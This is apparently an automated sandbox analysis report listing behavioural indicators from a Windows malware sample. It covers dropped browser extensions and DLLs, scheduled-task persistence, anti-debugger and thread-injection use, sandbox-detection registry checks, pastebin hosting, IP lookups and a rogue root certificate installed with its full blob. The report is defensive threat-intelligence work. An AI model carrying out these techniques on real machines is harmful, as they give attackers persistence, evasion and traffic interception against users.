File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json	ePwBJvh.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json	ePwBJvh.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json	FeVmxJU.exe

Drops desktop.ini file(s) 1 IoCs

description	ioc	Process
File opened for modification	C:\$RECYCLE.BIN\S-1-5-18\desktop.ini	ePwBJvh.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
101	pastebin.com
103	pastebin.com

Looks up external IP address via web service 9 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
170	api.myip.com
171	ipinfo.io
255	ipinfo.io
386	ipinfo.io
169	api.myip.com
172	ipinfo.io
256	ipinfo.io
385	ipinfo.io
390	ipinfo.io

AutoIT Executable 2 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral2/files/0x000a000000023b94-94.dat	autoit_exe
behavioral2/files/0x0007000000023cfa-996.dat	autoit_exe

Drops file in System32 directory 40 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\GroupPolicy\gpt.ini	Install.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft	ePwBJvh.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F3258A5B11F1178F530EE7A0197D8F15	ePwBJvh.exe
File opened for modification	C:\Windows\System32\GroupPolicy	4iGAcZ9y5M3XYvGSxSeOp8ig.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	Install.exe
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	ePwBJvh.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5	ePwBJvh.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5	ePwBJvh.exe
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	FeVmxJU.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies	ePwBJvh.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2DDCD2B5F37625B82E81F4976CEE400_672E22BF4DD6902F7F85F941E23571DA	ePwBJvh.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE	ePwBJvh.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache	ePwBJvh.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA	ePwBJvh.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2DDCD2B5F37625B82E81F4976CEE400_672E22BF4DD6902F7F85F941E23571DA	ePwBJvh.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E87CE99F124623F95572A696C80EFCAF_6E4381F77BE6F6EB436B295D285593C5	ePwBJvh.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_C66311BFC31F329FE5E6FBB46563B719	ePwBJvh.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_C66311BFC31F329FE5E6FBB46563B719	ePwBJvh.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData	ePwBJvh.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F3258A5B11F1178F530EE7A0197D8F15	ePwBJvh.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA	ePwBJvh.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA	ePwBJvh.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content	ePwBJvh.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751	ePwBJvh.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA	ePwBJvh.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E87CE99F124623F95572A696C80EFCAF_6E4381F77BE6F6EB436B295D285593C5	ePwBJvh.exe
File opened for modification	C:\Windows\System32\GroupPolicy\gpt.ini	4iGAcZ9y5M3XYvGSxSeOp8ig.exe
File created	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	4iGAcZ9y5M3XYvGSxSeOp8ig.exe
File opened for modification	C:\Windows\System32\GroupPolicy\GPT.INI	4iGAcZ9y5M3XYvGSxSeOp8ig.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751	ePwBJvh.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 13 IoCs

pid	Process
1300	65b13c88ba108bc85331d8fd4c92b5f84d48e63f612085a73eaec353f821ccc3.exe
1952	explorta.exe
3044	amert.exe
4852	explorha.exe
5168	4iGAcZ9y5M3XYvGSxSeOp8ig.exe
10496	explorta.exe
10488	explorha.exe
9208	explorta.exe
9236	explorha.exe
9632	explorha.exe
9764	explorta.exe
8952	explorta.exe
8584	explorha.exe

Suspicious use of SetThreadContext 5 IoCs

description	pid	Process	procid_target
PID 2600 set thread context of 2836	2600	swiiiii.exe	108
PID 5236 set thread context of 5404	5236	swiiii.exe	121
PID 5640 set thread context of 5740	5640	file300un.exe	125
PID 5212 set thread context of 5364	5212	gold.exe	133
PID 4524 set thread context of 5996	4524	alexxxxxxxx.exe	141

Drops file in Program Files directory 40 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe	install.exe
File created	C:\Program Files\Mozilla Firefox\browser\omni.ja.bak	ePwBJvh.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\omni.ja.bak	ePwBJvh.exe
File created	C:\Program Files (x86)\AymmxTCbqblaRZJGVqR\hoWsJUj.xml	ePwBJvh.exe
File created	C:\Program Files (x86)\mWJfrhglotUn\OTJKsMH.dll	ePwBJvh.exe
File created	C:\Program Files (x86)\GameSyncLink\installc.bat	install.exe
File opened for modification	C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe	install.exe
File opened for modification	C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe	install.exe
File created	C:\Program Files (x86)\ADJLsahCU\dttTey.dll	FeVmxJU.exe
File created	C:\Program Files (x86)\ADJLsahCU\SzuIXDd.xml	FeVmxJU.exe
File created	C:\Program Files (x86)\PZjcxajBIsNTC\AyddNKJ.xml	FeVmxJU.exe
File created	C:\Program Files (x86)\ADJLsahCU\aoOKSN.dll	ePwBJvh.exe
File created	C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi	ePwBJvh.exe
File created	C:\Program Files (x86)\AymmxTCbqblaRZJGVqR\khHwcBv.xml	FeVmxJU.exe
File opened for modification	C:\Program Files (x86)\GameSyncLink\installg.bat	install.exe
File opened for modification	C:\Program Files (x86)\GameSyncLink\installm.bat	install.exe
File created	C:\Program Files (x86)\GameSyncLink\GameService.exe	install.exe
File created	C:\Program Files (x86)\ADJLsahCU\dOAnjmP.xml	ePwBJvh.exe
File created	C:\Program Files (x86)\DQANlvmTAvZU2\WCEuOxG.xml	ePwBJvh.exe
File created	C:\Program Files (x86)\DQANlvmTAvZU2\NxOuwfD.xml	FeVmxJU.exe
File created	C:\Program Files (x86)\GameSyncLink\installg.bat	install.exe
File opened for modification	C:\Program Files (x86)\GameSyncLink\GameService.exe	install.exe
File created	C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe	install.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi	ePwBJvh.exe
File created	C:\Program Files (x86)\AymmxTCbqblaRZJGVqR\aWAIQaE.dll	FeVmxJU.exe
File created	C:\Program Files (x86)\GameSyncLink\installm.bat	install.exe
File created	C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe	install.exe
File created	C:\Program Files (x86)\DQANlvmTAvZU2\qaZoQOpKiSsNx.dll	ePwBJvh.exe
File created	C:\Program Files (x86)\AymmxTCbqblaRZJGVqR\KVeAEXb.dll	ePwBJvh.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi	FeVmxJU.exe
File opened for modification	C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe	install.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\omni.ja	ePwBJvh.exe
File created	C:\Program Files (x86)\PZjcxajBIsNTC\ETKMfSK.dll	ePwBJvh.exe
File created	C:\Program Files (x86)\PZjcxajBIsNTC\AxTqLog.dll	FeVmxJU.exe
File created	C:\Program Files (x86)\mWJfrhglotUn\RheLZOU.dll	FeVmxJU.exe
File opened for modification	C:\Program Files (x86)\GameSyncLink\installc.bat	install.exe
File created	C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi	FeVmxJU.exe
File created	C:\Program Files (x86)\PZjcxajBIsNTC\FLnCpLq.xml	ePwBJvh.exe
File created	C:\Program Files (x86)\DQANlvmTAvZU2\EdCtKtoTEelys.dll	FeVmxJU.exe
File created	C:\Program Files (x86)\GameSyncLink\status.txt	GameSyncLinks.exe

Drops file in Windows directory 9 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\explorta.job	65b13c88ba108bc85331d8fd4c92b5f84d48e63f612085a73eaec353f821ccc3.exe
File created	C:\Windows\Tasks\explorha.job	amert.exe
File created	C:\Windows\Tasks\FPieTEPPuEmJrhC.job	schtasks.exe
File created	C:\Windows\Tasks\rrqYunoktxOQmCoCX.job	schtasks.exe
File created	C:\Windows\Tasks\bbmnnUCIPYyTQrzMQJ.job	schtasks.exe
File opened for modification	C:\Windows\Tasks\bbmnnUCIPYyTQrzMQJ.job	schtasks.exe
File created	C:\Windows\Tasks\XyyyteIMwZeutaZuw.job	schtasks.exe
File opened for modification	C:\Windows\Tasks\XyyyteIMwZeutaZuw.job	schtasks.exe
File created	C:\Windows\Tasks\FPieTEPPuEmJrhC.job	schtasks.exe

Launches sc.exe 5 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
5908	sc.exe
5704	sc.exe
6576	sc.exe
6864	sc.exe
10196	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 3 IoCs

pid	pid_target	Process	procid_target
4668	2600	WerFault.exe	103
5708	4524	WerFault.exe	139
8268	3468	WerFault.exe	130

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	u2oc.1.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	u2oc.1.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	u2oc.1.exe

Checks processor information in registry 2 TTPs 4 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	a011c71051.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	a011c71051.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	ZEVaqp48Gz7MK9efLNaIrhhw.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	ZEVaqp48Gz7MK9efLNaIrhhw.exe

Creates scheduled task(s) 1 TTPs 27 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
7664	schtasks.exe
9280	schtasks.exe
9968	schtasks.exe
12156	schtasks.exe
2132	schtasks.exe
11352	schtasks.exe
10120	schtasks.exe
11312	schtasks.exe
4484	schtasks.exe
5272	schtasks.exe
1376	schtasks.exe
1768	schtasks.exe
10620	schtasks.exe
7716	schtasks.exe
7184	schtasks.exe
11844	schtasks.exe
11228	schtasks.exe
7692	schtasks.exe
10212	schtasks.exe
5484	schtasks.exe
5260	schtasks.exe
8048	schtasks.exe
10160	schtasks.exe
4800	schtasks.exe
9452	schtasks.exe
8940	schtasks.exe
9116	schtasks.exe

Enumerates system info in registry 2 TTPs 12 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	rundll32.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\SlowContextMenuEntries = fb9a790967add111abcd00c04fc30936090100006024b221ea3a6910a2dc08002b30309deb000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	FeVmxJU.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\TelemetrySalt = "2"	Install.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix	ePwBJvh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	Install.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:"	FeVmxJU.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	Install.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064	jok.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61	jok.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1300	65b13c88ba108bc85331d8fd4c92b5f84d48e63f612085a73eaec353f821ccc3.exe
1300	65b13c88ba108bc85331d8fd4c92b5f84d48e63f612085a73eaec353f821ccc3.exe
1952	explorta.exe
1952	explorta.exe
3044	amert.exe
3044	amert.exe
4852	explorha.exe
4852	explorha.exe
4860	chrome.exe
4860	chrome.exe
5728	powershell.exe
5728	powershell.exe
5728	powershell.exe
6048	rundll32.exe
6048	rundll32.exe
6048	rundll32.exe
6048	rundll32.exe
6048	rundll32.exe
6048	rundll32.exe
6048	rundll32.exe
6048	rundll32.exe
6048	rundll32.exe
6048	rundll32.exe
1624	powershell.exe
1624	powershell.exe
1624	powershell.exe
2084	jok.exe
2084	jok.exe
5540	keks.exe
5540	keks.exe
5540	keks.exe
5540	keks.exe
5540	keks.exe
5540	keks.exe
5540	keks.exe
5540	keks.exe
5540	keks.exe
5540	keks.exe
5540	keks.exe
5540	keks.exe
5540	keks.exe
5540	keks.exe
5540	keks.exe
5540	keks.exe
5540	keks.exe
5540	keks.exe
5540	keks.exe
5540	keks.exe
5540	keks.exe
5540	keks.exe
5540	keks.exe
5540	keks.exe
5540	keks.exe
5540	keks.exe
5540	keks.exe
5540	keks.exe
2084	jok.exe
2084	jok.exe
2084	jok.exe
2084	jok.exe
2084	jok.exe
2084	jok.exe
2084	jok.exe
2084	jok.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs

pid	Process
4860	chrome.exe
4860	chrome.exe
8320	msedge.exe
8320	msedge.exe
8320	msedge.exe
8320	msedge.exe
8320	msedge.exe
8320	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	4860	chrome.exe
Token: SeCreatePagefilePrivilege	4860	chrome.exe
Token: SeShutdownPrivilege	4860	chrome.exe
Token: SeCreatePagefilePrivilege	4860	chrome.exe
Token: SeShutdownPrivilege	4860	chrome.exe
